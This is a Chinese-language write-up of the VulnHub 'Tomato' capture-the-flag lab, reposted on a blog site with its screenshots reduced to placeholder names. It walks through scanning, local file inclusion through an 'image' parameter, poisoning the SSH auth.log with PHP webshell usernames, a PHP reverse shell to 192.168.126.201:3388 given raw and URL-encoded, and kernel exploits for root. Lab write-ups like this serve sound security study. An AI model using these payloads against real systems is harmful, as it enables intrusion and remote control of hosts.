首页 > 其他分享 >37、Tomato(VulnHub)

37、Tomato(VulnHub)

时间:2024-04-17 12:55:05浏览次数:26  
标签:Tomato log .. 恶意代码 image 37 192.168 VulnHub ssh

Tomato

一、nmap

image-20240415140601764

image-20240415140608030

2211是ssh的端口,21的ftp也不是弱密码

image-20240415140707281

image-20240415141738806

二、web渗透

随便看看

image-20240415141040323

image-20240415141151705

目录爆破

image-20240415141954187

image-20240415142001793

/seclists/Discovery/Web-Content/common.txt

image-20240415142401812

/antibot_image/antibots/readme.txt

发现该站点存在反爬机制

image-20240415144920809

/antibot_image/antibots/info.php

提示我们该网页存在个参数 GET:image参数

image-20240415145239568

image参数文件包含

image-20240415145614756

tomato:x:1000:1000:Tomato,,,:/home/tomato:/bin/bash 

包含出/var/log/auth.log文件

image-20240415150523295

测试看能不能写入日志

发现是成功写入用户名的

image-20240415150738006

ssh的恶意代码写入小插曲

这里很莫名其妙,kali的ssh就是无法连接一直显示remote username contains invalid characters

image-20240415154757888

使用Windows上装的linux内核mingw64运行

ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.126.235 -p 2211

image-20240415153743346

image-20240415154029252

image-20240415155104196

ssh的恶意代码写入

输入ssh '<?php echo shell_exec($_GET["cmd"]); ?>'@192.168.126.235 -p2211来将恶意代码视为用户名,利用log写入到靶机中(外侧一定要使用单引号,cmd使用双引号。否则无法执行)。不过再次包含 log文件的时候并没有发现恶意代码,这是个好事表明靶机并没有将恶意代码当为字符串执行,而是将其看为 php代码执行所以导致无法查看。上载下面的 payload发现成功的反弹了shell

ssh '<?php system($_GET["cmd"]); ?>'@192.168.126.235 -p2211
或
ssh '<?php echo shell_exec($_GET["cmd"]); ?>'@192.168.126.235 -p2211

image-20240415154137411

view-source:http://192.168.126.235/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log&&cmd=ls

image-20240415155405600

ssh的恶意代码写入反弹shell

php代码反弹shell
php -r '$sock=fsockopen("192.168.126.201",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

url编码后:
php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.126.201%22%2C3388%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

完整payload:
http://192.168.126.235/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.126.201%22%2C3388%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

image-20240415155945242

三、内网渗透

随便看看

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20240415160145098

尝试提权

image-20240415160238425

/linpeas.sh

image-20240415161459821

image-20240415161521135

image-20240415171132872

dirtyc0w提权尝试

image-20240415162742234

image-20240415162711523

CVE-2024-1086提权尝试

image-20240415163736951

kali本地编译CVE-2017-6074提权尝试

image-20240415170347850

image-20240415170408496

失败

换Ubuntu本地编译CVE-2017-6074提权尝试

image-20240415172215352

image-20240415170519723

成功

proof.txt

不过手要快哦,漏洞打进去很快系统就受不了了

image-20240415171306541

标签:Tomato,log,..,恶意代码,image,37,192.168,VulnHub,ssh
From: https://www.cnblogs.com/carmi/p/18140350

相关文章

  • Codeforces Round 937 (Div. 4) VP记录
    第一次VP比赛(也是第一次打CF)。感到自己距离退役又近了一步。A.Stair,Peak,orNeither?题意Youaregiventhreedigits\(a\),\(b\),and\(c\).Determinewhethertheyformastair,apeak,orneither.Astairsatisfiesthecondition\(a<b<c\).Apeaksatis......
  • P9437 『XYGOI round1』一棵树
    P9437『XYGOIround1』一棵树trick+换根dp对于此类「将数字顺次写下」计算贡献的题目,通常按位考虑,并且考虑每个数作为开头/结尾时的贡献,方便计算。因此,我们在这题中考虑每个数作为结尾时的贡献。那么这题就转化成:计算以\(u\)为根并且以\(a_u\)为结尾的贡献。明显的换......
  • P1373 小 a 和 uim 之大逃离
    这是一道好的dp题目链接:P1373小a和uim之大逃离题意:小a和uim两个人是绑在一起走的也就是说小a负责吸收第奇数次的魔液,而uim负责吸收偶数次的魔液那么最终要求的是所有由uim结束吸收后两人魔瓶中魔液相等的方法根据这个题意我们可以很好的列出状态转移方程f(i,j,c,0/1......
  • VMware 和 Oracle VM VirtualBox 网络互通(kali 与 vulnhub靶机 互通)
    由于有些从vulnhub下载的虚拟机只能用VirtualBox打开,而kali又在VMware上,两台虚拟机属于不同网段,即便同一网段也会存在无法上网的问题。在此记录一下解决方法首先查看kali(VMWare)与靶机(OracleVMVirtualBox)的IPkaliIP:192.168.198.128/24靶机IP:192.168.56.103/24(靶......
  • 377. 组合总和 IV
    题目链接:本题是爬楼梯的又一变式。分析样例可知,每次选择的都可以是\(\rmnums\)中的任一个数,而最后选择完毕的数之和等于\(\rmtarget\).可以认为我们每次从\(\rmnums\)中选一个数作为往上爬的台阶数,问爬\(\rmtarget\)个台阶有多少种方案。因此爬楼梯那个题可以认为......
  • Brainpan(VulnHub)
    Brainpan1、nmap2、web渗透随便看看目录爆破使用不同工具,不同字典进行爆破9999端口分析10000端口分析字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接下来就是之......
  • P2437 蜜蜂路线
    P2437蜜蜂路线题目描述一只蜜蜂在下图所示的数字蜂房上爬动,已知它只能从标号小的蜂房爬到标号大的相邻蜂房,现在问你:蜜蜂从蜂房\(m\)开始爬到蜂房\(n\),\(m<n\),有多少种爬行路线?(备注:题面有误,右上角应为\(n-1\))输入格式输入\(m,n\)的值输出格式爬行有多少种路线样例......
  • CF1837E Play Fixing 题解
    首先来考虑什么情况方案数为\(0\):可以确定,在某一层中,两个原本都能晋级的队伍比赛;可以确定,在某一层中,两个原本都不能晋级的队伍比赛。发现假如写出每一场比赛及其胜者,可以形成一棵树形结构,在里面打标记即可判断是否为\(0\)。我们设\(a_i\)表示第\(i\)层新加的队伍中位......
  • AC Automaton
    0.什么是自动机点我查看1.实现原理\(TRIE+KMP\),详细戳这里这里重点看代码实现#include<bits/stdc++.h>#defineN1000005usingnamespacestd;intT,n;chars[N],t[N];//模式串、文本串namespaceAC{ inttot; inttr[N][27];//字典树(图),u->i->tr[u][i]i是字母......
  • rand VS mt19937
    C++随机数randVsmt19937rand和mt19937介绍众所周知,程序无法模拟出真正的随机数,所以我们所说的随机数都是相对随机的伪随机数。rand是一种常用的随机数,C++初学者一般接触的都是他,但是他有缺点,随机性不高,周期短,质量低。Mt19937用法与rand一样但是他随机性高,周期长,质......